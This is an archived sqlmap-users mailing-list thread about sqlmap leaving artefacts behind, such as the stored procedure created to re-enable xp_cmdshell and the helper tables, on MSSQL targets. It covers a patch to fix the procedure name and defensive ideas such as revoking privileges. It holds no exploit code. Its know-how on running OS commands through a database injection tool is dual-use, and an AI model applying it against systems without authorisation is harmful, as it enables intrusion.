>> >> On 5 December 2014 at 21:14, Miroslav Stampar
>> >> <mir...@gm...> wrote:
>> >> > Now it is "new_xp_cmdshell" so no more random/dynamic names (easier
>> for
>> >> > cleanup in further runs)
>> >> >
>> >> > Bye
>> >> >
>> >> > On Fri, Dec 5, 2014 at 10:08 PM, Robin Wood <ro...@di...nja>
>> wrote:
>> >> >>
>> >> >> Sorry, somehow sent early, was trying to ask, is the name still
>> >> >> dynamic or is it now just a fixed name?
>> >> >>
>> >> >> Robin
>> >> >>
>> >> >> On 5 December 2014 at 21:07, Robin Wood <ro...@di...nja> wrote:
>> >> >> > OK, I've got a lab I can test it in later tonight.
>> >> >> >
>> >> >> > When you say not random, is it still dynamic va
>> >> >> >
>> >> >> > On 5 December 2014 at 21:03, Miroslav Stampar
>> >> >> > <mir...@gm...> wrote:
>> >> >> >> Hi.
>> >> >> >>
>> >> >> >> Just made a patch. Not around a testing environment to test it
>> out,
>> >> >> >> but
>> >> >> >> now
>> >> >> >> it should work (new proc name is not randomly generated from now
>> on
>> >> >> >> so
>> >> >> >> it
>> >> >> >> could be properly deleted afterwards).
>> >> >> >>
>> >> >> >> Bye
>> >> >> >>
>> >> >> >> On Fri, Dec 5, 2014 at 11:56 AM, Miroslav Stampar
>> >> >> >> <mir...@gm...> wrote:
>> >> >> >>>
>> >> >> >>> Will check this out in an hour or so. At first glance I can see
>> >> >> >>> that
>> >> >> >>> we
>> >> >> >>> have to make a patch for MsSQL.
>> >> >> >>>
>> >> >> >>> Bye
>> >> >> >>>
>> >> >> >>> On Thu, Dec 4, 2014 at 4:11 PM, Robin Wood <ro...@di...nja>
>> >> >> >>> wrote:
>> >> >> >>>>
>> >> >> >>>> Looking at the commands sent I can see three drop tables for
>> >> >> >>>> sqlmapfile, sqlmapfilehex and sqlmapoutput but nothing for
>> stored
>> >> >> >>>> procedures.
>> >> >> >>>>
>> >> >> >>>> On 4 December 2014 at 15:08, Robin Wood <ro...@di...nja>
>> wrote:
>> >> >> >>>> > Just spotted --cleanup but that didn't remove the procedure,
>> >> >> >>>> > sqlmap
>> >> >> >>>> > command seemed to run OK though but didn't say anything about
>> >> >> >>>> > what
>> >> >> >>>> > it
>> >> >> >>>> > was removing, should it have done?
>> >> >> >>>> >
>> >> >> >>>> > Robin
>> >> >> >>>> >
>> >> >> >>>> > On 4 December 2014 at 15:01, Robin Wood <ro...@di...nja>
>> >> >> >>>> > wrote:
>> >> >> >>>> >> I'm testing sqlmap against an MSSQL DB and looking at
>> running
>> >> >> >>>> >> OS
>> >> >> >>>> >> commands. In an attempt to reenable xp_cmdshell a stored
>> proc
>> >> >> >>>> >> called
>> >> >> >>>> >> xp_gedp has been created and left behind, is there any way
>> to
>> >> >> >>>> >> automatically clean up this and any other things that are
>> >> >> >>>> >> created?
>> >> >> >>>> >>
>> >> >> >>>> >> Robin
>> >> >> >>>>
>> >> >> >>>>
>> >> >> >>>>
>> >> >> >>>>
>> >> >> >>>>
>> ------------------------------------------------------------------------------
>> >> >> >>>> Download BIRT iHub F-Type - The Free Enterprise-Grade BIRT
>> Server
>> >> >> >>>> from Actuate! Instantly Supercharge Your Business Reports and
>> >> >> >>>> Dashboards
>> >> >> >>>> with Interactivity, Sharing, Native Excel Exports, App
>> Integration
>> >> >> >>>> &
>> >> >> >>>> more
>> >> >> >>>> Get technology previously reserved for billion-dollar
>> >> >> >>>> corporations,
>> >> >> >>>> FREE
>> >> >> >>>>
>> >> >> >>>>
>> >> >> >>>>
>> >> >> >>>>
>> http://pubads.g.doubleclick.net/gampad/clk?id=164703151&iu=/4140/ostg.clktrk
>> >> >> >>>> _______________________________________________
>> >> >> >>>> sqlmap-users mailing list
>> >> >> >>>> sql...@li...
>> >> >> >>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>> >> >> >>>
>> >> >> >>>
>> >> >> >>>
>> >> >> >>>
>> >> >> >>> --
>> >> >> >>> Miroslav Stampar
>> >> >> >>> http://about.me/stamparm
>> >> >> >>
>> >> >> >>
>> >> >> >>
>> >> >> >>
>> >> >> >> --
>> >> >> >> Miroslav Stampar
>> >> >> >> http://about.me/stamparm
>> >> >
>> >> >
>> >> >
>> >> >
>> >> > --
>> >> > Miroslav Stampar
>> >> > http://about.me/stamparm
>> >
>> >
>> >
>> >
>> > --
>> > Miroslav Stampar
>> > http://about.me/stamparm
>>
>>
>> ------------------------------------------------------------------------------
>> Download BIRT iHub F-Type - The Free Enterprise-Grade BIRT Server
>> from Actuate! Instantly Supercharge Your Business Reports and Dashboards
>> with Interactivity, Sharing, Native Excel Exports, App Integration & more
>> Get technology previously reserved for billion-dollar corporations, FREE
>>
>> http://pubads.g.doubleclick.net/gampad/clk?id=164703151&iu=/4140/ostg.clktrk
>> _______________________________________________
>> sqlmap-users mailing list
>> sql...@li...
>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>
>
>

Re: [sqlmap-users] cleaning up after yourself

[Rodrigo Z. S. <rod...@gm...>]

I already see that when trying to read a file in microsoft sql server it
create a "sqlmapfile" and didn't drop in the end. This is not a smart thing
to do.

By the way, I already tried to read any file using the sqlmap and none
worked. I see some absolute path in the server but without success until
now.

Any idea from a single file that I can read just to see that it is working?
Any common file in the Microsoft SQL SErver 2008 R2?

2014-12-05 19:30 GMT-02:00 Robin Wood <ro...@di...nja>:

> Fair enough, all valid points. I'd not looked at the fixed table names
> till looking at cleanup so hadn't thought about any of it before.
>
> Robin
>
> On 5 December 2014 at 21:27, Miroslav Stampar
> <mir...@gm...> wrote:
> > Well, if you think like that, used auxiliary table names are also static
> > (sqlmapfile, sqlmapfilehex and sqlmapoutput). But... leaving table names
> and
> > proc names for defensive purposes just like that around will only create
> > panic. Also, non-skiddy will easily detect that there is already a
> > proc/table name with the same name causing the problem and he will easily
> > adapt either sqlmap or drop older entities (e.g. via --cleanup).
> >
> > Why wouldn't you revoke privileges for creating of tables and/or
> procedures
> > for defensive purposes rather than laying around sqlmap... inside
> database?
> >
> > Bye
> >
> > On Fri, Dec 5, 2014 at 10:19 PM, Robin Wood <ro...@di...nja> wrote:
> >>
> >> Does this mean as a defence we could create a procedure with the same
> >> name which would block the creation?
> >>
> >> Robin
> >>
> >> On 5 December 2014 at 21:14, Miroslav Stampar
> >> <mir...@gm...> wrote:
> >> > Now it is "new_xp_cmdshell" so no more random/dynamic names (easier
> for
> >> > cleanup in further runs)
> >> >
> >> > Bye
> >> >
> >> > On Fri, Dec 5, 2014 at 10:08 PM, Robin Wood <ro...@di...nja> wrote:
> >> >>
> >> >> Sorry, somehow sent early, was trying to ask, is the name still
> >> >> dynamic or is it now just a fixed name?
> >> >>
> >> >> Robin
> >> >>
> >> >> On 5 December 2014 at 21:07, Robin Wood <ro...@di...nja> wrote:
> >> >> > OK, I've got a lab I can test it in later tonight.
> >> >> >
> >> >> > When you say not random, is it still dynamic va
> >> >> >
> >> >> > On 5 December 2014 at 21:03, Miroslav Stampar
> >> >> > <mir...@gm...> wrote:
> >> >> >> Hi.
> >> >> >>
> >> >> >> Just made a patch. Not around a testing environment to test it
> out,
> >> >> >> but
> >> >> >> now
> >> >> >> it should work (new proc name is not randomly generated from now
> on
> >> >> >> so
> >> >> >> it
> >> >> >> could be properly deleted afterwards).
> >> >> >>
> >> >> >> Bye
> >> >> >>
> >> >> >> On Fri, Dec 5, 2014 at 11:56 AM, Miroslav Stampar
> >> >> >> <mir...@gm...> wrote:
> >> >> >>>
> >> >> >>> Will check this out in an hour or so. At first glance I can see
> >> >> >>> that
> >> >> >>> we
> >> >> >>> have to make a patch for MsSQL.
> >> >> >>>
> >> >> >>> Bye
> >> >> >>>
> >> >> >>> On Thu, Dec 4, 2014 at 4:11 PM, Robin Wood <ro...@di...nja>
> >> >> >>> wrote:
> >> >> >>>>
> >> >> >>>> Looking at the commands sent I can see three drop tables for
> >> >> >>>> sqlmapfile, sqlmapfilehex and sqlmapoutput but nothing for
> stored
> >> >> >>>> procedures.
> >> >> >>>>
> >> >> >>>> On 4 December 2014 at 15:08, Robin Wood <ro...@di...nja>
> wrote:
> >> >> >>>> > Just spotted --cleanup but that didn't remove the procedure,
> >> >> >>>> > sqlmap
> >> >> >>>> > command seemed to run OK though but didn't say anything about
> >> >> >>>> > what
> >> >> >>>> > it
> >> >> >>>> > was removing, should it have done?
> >> >> >>>> >
> >> >> >>>> > Robin
> >> >> >>>> >
> >> >> >>>> > On 4 December 2014 at 15:01, Robin Wood <ro...@di...nja>
> >> >> >>>> > wrote:
> >> >> >>>> >> I'm testing sqlmap against an MSSQL DB and looking at running
> >> >> >>>> >> OS
> >> >> >>>> >> commands. In an attempt to reenable xp_cmdshell a stored proc
> >> >> >>>> >> called
> >> >> >>>> >> xp_gedp has been created and left behind, is there any way to
> >> >> >>>> >> automatically clean up this and any other things that are
> >> >> >>>> >> created?
> >> >> >>>> >>
> >> >> >>>> >> Robin
> >> >> >>>>
> >> >> >>>>
> >> >> >>>>
> >> >> >>>>
> >> >> >>>>
> ------------------------------------------------------------------------------
> >> >> >>>> Download BIRT iHub F-Type - The Free Enterprise-Grade BIRT
> Server
> >> >> >>>> from Actuate! Instantly Supercharge Your Business Reports and
> >> >> >>>> Dashboards
> >> >> >>>> with Interactivity, Sharing, Native Excel Exports, App
> Integration
> >> >> >>>> &
> >> >> >>>> more
> >> >> >>>> Get technology previously reserved for billion-dollar
> >> >> >>>> corporations,
> >> >> >>>> FREE
> >> >> >>>>
> >> >> >>>>
> >> >> >>>>
> >> >> >>>>
> http://pubads.g.doubleclick.net/gampad/clk?id=164703151&iu=/4140/ostg.clktrk
> >> >> >>>> _______________________________________________
> >> >> >>>> sqlmap-users mailing list
> >> >> >>>> sql...@li...
> >> >> >>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
> >> >> >>>
> >> >> >>>
> >> >> >>>
> >> >> >>>
> >> >> >>> --
> >> >> >>> Miroslav Stampar
> >> >> >>> http://about.me/stamparm
> >> >> >>
> >> >> >>
> >> >> >>
> >> >> >>
> >> >> >> --
> >> >> >> Miroslav Stampar
> >> >> >> http://about.me/stamparm
> >> >
> >> >
> >> >
> >> >
> >> > --
> >> > Miroslav Stampar
> >> > http://about.me/stamparm
> >
> >
> >
> >
> > --
> > Miroslav Stampar
> > http://about.me/stamparm
>
>
> ------------------------------------------------------------------------------
> Download BIRT iHub F-Type - The Free Enterprise-Grade BIRT Server
> from Actuate! Instantly Supercharge Your Business Reports and Dashboards
> with Interactivity, Sharing, Native Excel Exports, App Integration & more
> Get technology previously reserved for billion-dollar corporations, FREE
>
> http://pubads.g.doubleclick.net/gampad/clk?id=164703151&iu=/4140/ostg.clktrk
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>

Re: [sqlmap-users] cleaning up after yourself

[Robin W. <ro...@di...>]

Fair enough, all valid points. I'd not looked at the fixed table names
till looking at cleanup so hadn't thought about any of it before.

Robin

On 5 December 2014 at 21:27, Miroslav Stampar
<mir...@gm...> wrote:
> Well, if you think like that, used auxiliary table names are also static
> (sqlmapfile, sqlmapfilehex and sqlmapoutput). But... leaving table names and
> proc names for defensive purposes just like that around will only create
> panic. Also, non-skiddy will easily detect that there is already a
> proc/table name with the same name causing the problem and he will easily
> adapt either sqlmap or drop older entities (e.g. via --cleanup).
>
> Why wouldn't you revoke privileges for creating of tables and/or procedures
> for defensive purposes rather than laying around sqlmap... inside database?
>
> Bye
>
> On Fri, Dec 5, 2014 at 10:19 PM, Robin Wood <ro...@di...nja> wrote:
>>
>> Does this mean as a defence we could create a procedure with the same
>> name which would block the creation?
>>
>> Robin
>>
>> On 5 December 2014 at 21:14, Miroslav Stampar
>> <mir...@gm...> wrote:
>> > Now it is "new_xp_cmdshell" so no more random/dynamic names (easier for
>> > cleanup in further runs)
>> >
>> > Bye
>> >
>> > On Fri, Dec 5, 2014 at 10:08 PM, Robin Wood <ro...@di...nja> wrote:
>> >>
>> >> Sorry, somehow sent early, was trying to ask, is the name still
>> >> dynamic or is it now just a fixed name?
>> >>
>> >> Robin
>> >>
>> >> On 5 December 2014 at 21:07, Robin Wood <ro...@di...nja> wrote:
>> >> > OK, I've got a lab I can test it in later tonight.
>> >> >
>> >> > When you say not random, is it still dynamic va
>> >> >
>> >> > On 5 December 2014 at 21:03, Miroslav Stampar
>> >> > <mir...@gm...> wrote:
>> >> >> Hi.
>> >> >>
>> >> >> Just made a patch. Not around a testing environment to test it out,
>> >> >> but
>> >> >> now
>> >> >> it should work (new proc name is not randomly generated from now on
>> >> >> so
>> >> >> it
>> >> >> could be properly deleted afterwards).
>> >> >>
>> >> >> Bye
>> >> >>
>> >> >> On Fri, Dec 5, 2014 at 11:56 AM, Miroslav Stampar
>> >> >> <mir...@gm...> wrote:
>> >> >>>
>> >> >>> Will check this out in an hour or so. At first glance I can see
>> >> >>> that
>> >> >>> we
>> >> >>> have to make a patch for MsSQL.
>> >> >>>
>> >> >>> Bye
>> >> >>>
>> >> >>> On Thu, Dec 4, 2014 at 4:11 PM, Robin Wood <ro...@di...nja>
>> >> >>> wrote:
>> >> >>>>
>> >> >>>> Looking at the commands sent I can see three drop tables for
>> >> >>>> sqlmapfile, sqlmapfilehex and sqlmapoutput but nothing for stored
>> >> >>>> procedures.
>> >> >>>>
>> >> >>>> On 4 December 2014 at 15:08, Robin Wood <ro...@di...nja> wrote:
>> >> >>>> > Just spotted --cleanup but that didn't remove the procedure,
>> >> >>>> > sqlmap
>> >> >>>> > command seemed to run OK though but didn't say anything about
>> >> >>>> > what
>> >> >>>> > it
>> >> >>>> > was removing, should it have done?
>> >> >>>> >
>> >> >>>> > Robin
>> >> >>>> >
>> >> >>>> > On 4 December 2014 at 15:01, Robin Wood <ro...@di...nja>
>> >> >>>> > wrote:
>> >> >>>> >> I'm testing sqlmap against an MSSQL DB and looking at running
>> >> >>>> >> OS
>> >> >>>> >> commands. In an attempt to reenable xp_cmdshell a stored proc
>> >> >>>> >> called
>> >> >>>> >> xp_gedp has been created and left behind, is there any way to
>> >> >>>> >> automatically clean up this and any other things that are
>> >> >>>> >> created?
>> >> >>>> >>
>> >> >>>> >> Robin
>> >> >>>>
>> >> >>>>
>> >> >>>>
>> >> >>>>
>> >> >>>> ------------------------------------------------------------------------------
>> >> >>>> Download BIRT iHub F-Type - The Free Enterprise-Grade BIRT Server
>> >> >>>> from Actuate! Instantly Supercharge Your Business Reports and
>> >> >>>> Dashboards
>> >> >>>> with Interactivity, Sharing, Native Excel Exports, App Integration
>> >> >>>> &
>> >> >>>> more
>> >> >>>> Get technology previously reserved for billion-dollar
>> >> >>>> corporations,
>> >> >>>> FREE
>> >> >>>>
>> >> >>>>
>> >> >>>>
>> >> >>>> http://pubads.g.doubleclick.net/gampad/clk?id=164703151&iu=/4140/ostg.clktrk
>> >> >>>> _______________________________________________
>> >> >>>> sqlmap-users mailing list
>> >> >>>> sql...@li...
>> >> >>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>> >> >>>
>> >> >>>
>> >> >>>
>> >> >>>
>> >> >>> --
>> >> >>> Miroslav Stampar
>> >> >>> http://about.me/stamparm
>> >> >>
>> >> >>
>> >> >>
>> >> >>
>> >> >> --
>> >> >> Miroslav Stampar
>> >> >> http://about.me/stamparm
>> >
>> >
>> >
>> >
>> > --
>> > Miroslav Stampar
>> > http://about.me/stamparm
>
>
>
>
> --
> Miroslav Stampar
> http://about.me/stamparm

Re: [sqlmap-users] cleaning up after yourself

[Miroslav S. <mir...@gm...>]

Well, if you think like that, used auxiliary table names are also static
(sqlmapfile, sqlmapfilehex and sqlmapoutput). But... leaving table names
and proc names for defensive purposes just like that around will only
create panic. Also, non-skiddy will easily detect that there is already a
proc/table name with the same name causing the problem and he will easily
adapt either sqlmap or drop older entities (e.g. via --cleanup).

Why wouldn't you revoke privileges for creating of tables and/or procedures
for defensive purposes rather than laying around sqlmap... inside database?

Bye

On Fri, Dec 5, 2014 at 10:19 PM, Robin Wood <ro...@di...nja> wrote:

> Does this mean as a defence we could create a procedure with the same
> name which would block the creation?
>
> Robin
>
> On 5 December 2014 at 21:14, Miroslav Stampar
> <mir...@gm...> wrote:
> > Now it is "new_xp_cmdshell" so no more random/dynamic names (easier for
> > cleanup in further runs)
> >
> > Bye
> >
> > On Fri, Dec 5, 2014 at 10:08 PM, Robin Wood <ro...@di...nja> wrote:
> >>
> >> Sorry, somehow sent early, was trying to ask, is the name still
> >> dynamic or is it now just a fixed name?
> >>
> >> Robin
> >>
> >> On 5 December 2014 at 21:07, Robin Wood <ro...@di...nja> wrote:
> >> > OK, I've got a lab I can test it in later tonight.
> >> >
> >> > When you say not random, is it still dynamic va
> >> >
> >> > On 5 December 2014 at 21:03, Miroslav Stampar
> >> > <mir...@gm...> wrote:
> >> >> Hi.
> >> >>
> >> >> Just made a patch. Not around a testing environment to test it out,
> but
> >> >> now
> >> >> it should work (new proc name is not randomly generated from now on
> so
> >> >> it
> >> >> could be properly deleted afterwards).
> >> >>
> >> >> Bye
> >> >>
> >> >> On Fri, Dec 5, 2014 at 11:56 AM, Miroslav Stampar
> >> >> <mir...@gm...> wrote:
> >> >>>
> >> >>> Will check this out in an hour or so. At first glance I can see that
> >> >>> we
> >> >>> have to make a patch for MsSQL.
> >> >>>
> >> >>> Bye
> >> >>>
> >> >>> On Thu, Dec 4, 2014 at 4:11 PM, Robin Wood <ro...@di...nja>
> wrote:
> >> >>>>
> >> >>>> Looking at the commands sent I can see three drop tables for
> >> >>>> sqlmapfile, sqlmapfilehex and sqlmapoutput but nothing for stored
> >> >>>> procedures.
> >> >>>>
> >> >>>> On 4 December 2014 at 15:08, Robin Wood <ro...@di...nja> wrote:
> >> >>>> > Just spotted --cleanup but that didn't remove the procedure,
> sqlmap
> >> >>>> > command seemed to run OK though but didn't say anything about
> what
> >> >>>> > it
> >> >>>> > was removing, should it have done?
> >> >>>> >
> >> >>>> > Robin
> >> >>>> >
> >> >>>> > On 4 December 2014 at 15:01, Robin Wood <ro...@di...nja>
> wrote:
> >> >>>> >> I'm testing sqlmap against an MSSQL DB and looking at running OS
> >> >>>> >> commands. In an attempt to reenable xp_cmdshell a stored proc
> >> >>>> >> called
> >> >>>> >> xp_gedp has been created and left behind, is there any way to
> >> >>>> >> automatically clean up this and any other things that are
> created?
> >> >>>> >>
> >> >>>> >> Robin
> >> >>>>
> >> >>>>
> >> >>>>
> >> >>>>
> ------------------------------------------------------------------------------
> >> >>>> Download BIRT iHub F-Type - The Free Enterprise-Grade BIRT Server
> >> >>>> from Actuate! Instantly Supercharge Your Business Reports and
> >> >>>> Dashboards
> >> >>>> with Interactivity, Sharing, Native Excel Exports, App Integration
> &
> >> >>>> more
> >> >>>> Get technology previously reserved for billion-dollar corporations,
> >> >>>> FREE
> >> >>>>
> >> >>>>
> >> >>>>
> http://pubads.g.doubleclick.net/gampad/clk?id=164703151&iu=/4140/ostg.clktrk
> >> >>>> _______________________________________________
> >> >>>> sqlmap-users mailing list
> >> >>>> sql...@li...
> >> >>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
> >> >>>
> >> >>>
> >> >>>
> >> >>>
> >> >>> --
> >> >>> Miroslav Stampar
> >> >>> http://about.me/stamparm
> >> >>
> >> >>
> >> >>
> >> >>
> >> >> --
> >> >> Miroslav Stampar
> >> >> http://about.me/stamparm
> >
> >
> >
> >
> > --
> > Miroslav Stampar
> > http://about.me/stamparm
>



-- 
Miroslav Stampar
http://about.me/stamparm

Re: [sqlmap-users] cleaning up after yourself

[Robin W. <ro...@di...>]

Does this mean as a defence we could create a procedure with the same
name which would block the creation?

Robin

On 5 December 2014 at 21:14, Miroslav Stampar
<mir...@gm...> wrote:
> Now it is "new_xp_cmdshell" so no more random/dynamic names (easier for
> cleanup in further runs)
>
> Bye
>
> On Fri, Dec 5, 2014 at 10:08 PM, Robin Wood <ro...@di...nja> wrote:
>>
>> Sorry, somehow sent early, was trying to ask, is the name still
>> dynamic or is it now just a fixed name?
>>
>> Robin
>>
>> On 5 December 2014 at 21:07, Robin Wood <ro...@di...nja> wrote:
>> > OK, I've got a lab I can test it in later tonight.
>> >
>> > When you say not random, is it still dynamic va
>> >
>> > On 5 December 2014 at 21:03, Miroslav Stampar
>> > <mir...@gm...> wrote:
>> >> Hi.
>> >>
>> >> Just made a patch. Not around a testing environment to test it out, but
>> >> now
>> >> it should work (new proc name is not randomly generated from now on so
>> >> it
>> >> could be properly deleted afterwards).
>> >>
>> >> Bye
>> >>
>> >> On Fri, Dec 5, 2014 at 11:56 AM, Miroslav Stampar
>> >> <mir...@gm...> wrote:
>> >>>
>> >>> Will check this out in an hour or so. At first glance I can see that
>> >>> we
>> >>> have to make a patch for MsSQL.
>> >>>
>> >>> Bye
>> >>>
>> >>> On Thu, Dec 4, 2014 at 4:11 PM, Robin Wood <ro...@di...nja> wrote:
>> >>>>
>> >>>> Looking at the commands sent I can see three drop tables for
>> >>>> sqlmapfile, sqlmapfilehex and sqlmapoutput but nothing for stored
>> >>>> procedures.
>> >>>>
>> >>>> On 4 December 2014 at 15:08, Robin Wood <ro...@di...nja> wrote:
>> >>>> > Just spotted --cleanup but that didn't remove the procedure, sqlmap
>> >>>> > command seemed to run OK though but didn't say anything about what
>> >>>> > it
>> >>>> > was removing, should it have done?
>> >>>> >
>> >>>> > Robin
>> >>>> >
>> >>>> > On 4 December 2014 at 15:01, Robin Wood <ro...@di...nja> wrote:
>> >>>> >> I'm testing sqlmap against an MSSQL DB and looking at running OS
>> >>>> >> commands. In an attempt to reenable xp_cmdshell a stored proc
>> >>>> >> called
>> >>>> >> xp_gedp has been created and left behind, is there any way to
>> >>>> >> automatically clean up this and any other things that are created?
>> >>>> >>
>> >>>> >> Robin
>> >>>>
>> >>>>
>> >>>>
>> >>>> ------------------------------------------------------------------------------
>> >>>> Download BIRT iHub F-Type - The Free Enterprise-Grade BIRT Server
>> >>>> from Actuate! Instantly Supercharge Your Business Reports and
>> >>>> Dashboards
>> >>>> with Interactivity, Sharing, Native Excel Exports, App Integration &
>> >>>> more
>> >>>> Get technology previously reserved for billion-dollar corporations,
>> >>>> FREE
>> >>>>
>> >>>>
>> >>>> http://pubads.g.doubleclick.net/gampad/clk?id=164703151&iu=/4140/ostg.clktrk
>> >>>> _______________________________________________
>> >>>> sqlmap-users mailing list
>> >>>> sql...@li...
>> >>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>> >>>
>> >>>
>> >>>
>> >>>
>> >>> --
>> >>> Miroslav Stampar
>> >>> http://about.me/stamparm
>> >>
>> >>
>> >>
>> >>
>> >> --
>> >> Miroslav Stampar
>> >> http://about.me/stamparm
>
>
>
>
> --
> Miroslav Stampar
> http://about.me/stamparm

Re: [sqlmap-users] cleaning up after yourself

[Miroslav S. <mir...@gm...>]

Now it is "new_xp_cmdshell" so no more random/dynamic names (easier for
cleanup in further runs)

Bye

On Fri, Dec 5, 2014 at 10:08 PM, Robin Wood <ro...@di...nja> wrote:

> Sorry, somehow sent early, was trying to ask, is the name still
> dynamic or is it now just a fixed name?
>
> Robin
>
> On 5 December 2014 at 21:07, Robin Wood <ro...@di...nja> wrote:
> > OK, I've got a lab I can test it in later tonight.
> >
> > When you say not random, is it still dynamic va
> >
> > On 5 December 2014 at 21:03, Miroslav Stampar
> > <mir...@gm...> wrote:
> >> Hi.
> >>
> >> Just made a patch. Not around a testing environment to test it out, but
> now
> >> it should work (new proc name is not randomly generated from now on so
> it
> >> could be properly deleted afterwards).
> >>
> >> Bye
> >>
> >> On Fri, Dec 5, 2014 at 11:56 AM, Miroslav Stampar
> >> <mir...@gm...> wrote:
> >>>
> >>> Will check this out in an hour or so. At first glance I can see that we
> >>> have to make a patch for MsSQL.
> >>>
> >>> Bye
> >>>
> >>> On Thu, Dec 4, 2014 at 4:11 PM, Robin Wood <ro...@di...nja> wrote:
> >>>>
> >>>> Looking at the commands sent I can see three drop tables for
> >>>> sqlmapfile, sqlmapfilehex and sqlmapoutput but nothing for stored
> >>>> procedures.
> >>>>
> >>>> On 4 December 2014 at 15:08, Robin Wood <ro...@di...nja> wrote:
> >>>> > Just spotted --cleanup but that didn't remove the procedure, sqlmap
> >>>> > command seemed to run OK though but didn't say anything about what
> it
> >>>> > was removing, should it have done?
> >>>> >
> >>>> > Robin
> >>>> >
> >>>> > On 4 December 2014 at 15:01, Robin Wood <ro...@di...nja> wrote:
> >>>> >> I'm testing sqlmap against an MSSQL DB and looking at running OS
> >>>> >> commands. In an attempt to reenable xp_cmdshell a stored proc
> called
> >>>> >> xp_gedp has been created and left behind, is there any way to
> >>>> >> automatically clean up this and any other things that are created?
> >>>> >>
> >>>> >> Robin
> >>>>
> >>>>
> >>>>
> ------------------------------------------------------------------------------
> >>>> Download BIRT iHub F-Type - The Free Enterprise-Grade BIRT Server
> >>>> from Actuate! Instantly Supercharge Your Business Reports and
> Dashboards
> >>>> with Interactivity, Sharing, Native Excel Exports, App Integration &
> more
> >>>> Get technology previously reserved for billion-dollar corporations,
> FREE
> >>>>
> >>>>
> http://pubads.g.doubleclick.net/gampad/clk?id=164703151&iu=/4140/ostg.clktrk
> >>>> _______________________________________________
> >>>> sqlmap-users mailing list
> >>>> sql...@li...
> >>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
> >>>
> >>>
> >>>
> >>>
> >>> --
> >>> Miroslav Stampar
> >>> http://about.me/stamparm
> >>
> >>
> >>
> >>
> >> --
> >> Miroslav Stampar
> >> http://about.me/stamparm
>



-- 
Miroslav Stampar
http://about.me/stamparm

Re: [sqlmap-users] cleaning up after yourself

[Robin W. <ro...@di...>]

Sorry, somehow sent early, was trying to ask, is the name still
dynamic or is it now just a fixed name?

Robin

On 5 December 2014 at 21:07, Robin Wood <ro...@di...nja> wrote:
> OK, I've got a lab I can test it in later tonight.
>
> When you say not random, is it still dynamic va
>
> On 5 December 2014 at 21:03, Miroslav Stampar
> <mir...@gm...> wrote:
>> Hi.
>>
>> Just made a patch. Not around a testing environment to test it out, but now
>> it should work (new proc name is not randomly generated from now on so it
>> could be properly deleted afterwards).
>>
>> Bye
>>
>> On Fri, Dec 5, 2014 at 11:56 AM, Miroslav Stampar
>> <mir...@gm...> wrote:
>>>
>>> Will check this out in an hour or so. At first glance I can see that we
>>> have to make a patch for MsSQL.
>>>
>>> Bye
>>>
>>> On Thu, Dec 4, 2014 at 4:11 PM, Robin Wood <ro...@di...nja> wrote:
>>>>
>>>> Looking at the commands sent I can see three drop tables for
>>>> sqlmapfile, sqlmapfilehex and sqlmapoutput but nothing for stored
>>>> procedures.
>>>>
>>>> On 4 December 2014 at 15:08, Robin Wood <ro...@di...nja> wrote:
>>>> > Just spotted --cleanup but that didn't remove the procedure, sqlmap
>>>> > command seemed to run OK though but didn't say anything about what it
>>>> > was removing, should it have done?
>>>> >
>>>> > Robin
>>>> >
>>>> > On 4 December 2014 at 15:01, Robin Wood <ro...@di...nja> wrote:
>>>> >> I'm testing sqlmap against an MSSQL DB and looking at running OS
>>>> >> commands. In an attempt to reenable xp_cmdshell a stored proc called
>>>> >> xp_gedp has been created and left behind, is there any way to
>>>> >> automatically clean up this and any other things that are created?
>>>> >>
>>>> >> Robin
>>>>
>>>>
>>>> ------------------------------------------------------------------------------
>>>> Download BIRT iHub F-Type - The Free Enterprise-Grade BIRT Server
>>>> from Actuate! Instantly Supercharge Your Business Reports and Dashboards
>>>> with Interactivity, Sharing, Native Excel Exports, App Integration & more
>>>> Get technology previously reserved for billion-dollar corporations, FREE
>>>>
>>>> http://pubads.g.doubleclick.net/gampad/clk?id=164703151&iu=/4140/ostg.clktrk
>>>> _______________________________________________
>>>> sqlmap-users mailing list
>>>> sql...@li...
>>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>>
>>>
>>>
>>>
>>> --
>>> Miroslav Stampar
>>> http://about.me/stamparm
>>
>>
>>
>>
>> --
>> Miroslav Stampar
>> http://about.me/stamparm

Re: [sqlmap-users] cleaning up after yourself

[Robin W. <ro...@di...>]

OK, I've got a lab I can test it in later tonight.

When you say not random, is it still dynamic va

On 5 December 2014 at 21:03, Miroslav Stampar
<mir...@gm...> wrote:
> Hi.
>
> Just made a patch. Not around a testing environment to test it out, but now
> it should work (new proc name is not randomly generated from now on so it
> could be properly deleted afterwards).
>
> Bye
>
> On Fri, Dec 5, 2014 at 11:56 AM, Miroslav Stampar
> <mir...@gm...> wrote:
>>
>> Will check this out in an hour or so. At first glance I can see that we
>> have to make a patch for MsSQL.
>>
>> Bye
>>
>> On Thu, Dec 4, 2014 at 4:11 PM, Robin Wood <ro...@di...nja> wrote:
>>>
>>> Looking at the commands sent I can see three drop tables for
>>> sqlmapfile, sqlmapfilehex and sqlmapoutput but nothing for stored
>>> procedures.
>>>
>>> On 4 December 2014 at 15:08, Robin Wood <ro...@di...nja> wrote:
>>> > Just spotted --cleanup but that didn't remove the procedure, sqlmap
>>> > command seemed to run OK though but didn't say anything about what it
>>> > was removing, should it have done?
>>> >
>>> > Robin
>>> >
>>> > On 4 December 2014 at 15:01, Robin Wood <ro...@di...nja> wrote:
>>> >> I'm testing sqlmap against an MSSQL DB and looking at running OS
>>> >> commands. In an attempt to reenable xp_cmdshell a stored proc called
>>> >> xp_gedp has been created and left behind, is there any way to
>>> >> automatically clean up this and any other things that are created?
>>> >>
>>> >> Robin
>>>
>>>
>>> ------------------------------------------------------------------------------
>>> Download BIRT iHub F-Type - The Free Enterprise-Grade BIRT Server
>>> from Actuate! Instantly Supercharge Your Business Reports and Dashboards
>>> with Interactivity, Sharing, Native Excel Exports, App Integration & more
>>> Get technology previously reserved for billion-dollar corporations, FREE
>>>
>>> http://pubads.g.doubleclick.net/gampad/clk?id=164703151&iu=/4140/ostg.clktrk
